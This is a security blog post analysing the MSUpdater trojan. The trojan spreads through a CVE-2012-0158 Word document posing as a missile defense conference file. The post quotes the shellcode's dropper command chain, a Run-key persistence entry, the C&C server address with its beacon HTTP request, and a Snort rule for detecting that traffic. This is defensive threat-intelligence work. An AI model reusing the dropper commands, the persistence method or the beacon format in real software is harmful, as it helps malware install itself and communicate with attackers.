MSUpdater Trojan found using CVE-2012-0158: Space and Missile Defense Conference

April 23, 2012 | Jaime Blasco
X

Get the latest security news in your inbox.

Subscribe via Email

No thanks. Close this now.

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against several industries. One of the campaigns which attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims have still a low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

So the victim will show the following document:

The binary created by the shellcode is a dropper that contains the actual malware embedded on a resource. After deciphering the content, it creates the new binary under \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry key in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd SZ \“C:\\Documents and Settings\\Joe Maldive\\Local Settings\\Application Data\\GoogleUpdate.exe\”

The payload is detected as BKDR_FYNLOS.SM1 and has been used in order similar attacks in the past. The malware connects to the  C&C server with address 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)

Host: 204.13.66.119

Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded version of the machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago.  Once again the group behind these attacks are using conference related subjects as a lure to target these industries.

You can use the following snort rule already present on Emerging Threats to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:“ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1”; flow:from_client,established; content:”/search”; http_uri; content:”?h1=”; fast_pattern; http_uri; content:”&h2=”; distance:0; http_uri; content:”&h3=”; distance:0; http_uri; content:“User-Agent|3a| Mozilla/5.0 (compatible|3B|”; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
Read more posts from Jaime Blasco ›

‹ BACK TO ALL BLOGS

Watch a Demo ›
GET PRICE FREE TRIAL